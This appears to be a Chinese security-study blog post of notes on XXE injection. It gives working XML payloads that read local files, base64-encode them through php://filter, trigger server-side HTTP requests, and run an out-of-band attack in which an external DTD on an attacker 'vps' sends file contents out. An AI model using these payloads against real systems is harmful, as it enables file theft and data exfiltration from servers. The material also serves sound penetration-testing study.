xxe重点内容

XXE重点内容

基础知识:https://www.cnblogs.com/l0nmar/p/13339015.html

1.xxe读取本地文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
	<!ENTITY xxe SYSTEM "file:///c:/windows/system.ini">
]>
<root>&xxe;</root>

2.当读取的本地文件内容包含 < & 等特殊字符时,读取会报错,此时有两种方法

  • 采用CDATA、PCDATA等方式,在外部dtd拼接读取。详见:https://www.bilibili.com/video/BV1Ty4y1Y7gs?p=21&spm_id_from=pageDriver&vd_source=ed55cea68ca30d00bac42f61348f3d9a
  • 结合php伪协议,php://filter/read=convert.base64-encode/resource=c:/windows/system.ini
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
	<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/windows/system.ini">
]>
<root>&xxe;</root>

3.xxe发起http请求

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
	<!ENTITY xxe SYSTEM "http://ip:port/path">
]>
<root>&xxe;</root>
4.当target主机没有回显时,需要外带out-of-band(OOB)

攻击者发送http数据包, 携带xml数据, 此时需要在外部dtd文件进行参数实体的拼接。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE convert 
[
<!ENTITY % remote SYSTEM "http://vps:放置dtd文件的端口/xx.dtd" >
%remote;%int;%send;]>

我们要在vps上放置dtd文件,如下

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=要读取的内容">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://vps:接收回显数据的端口/?p=%file;'>">

发送该请求即可,该方法需要目标主机能够出网。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值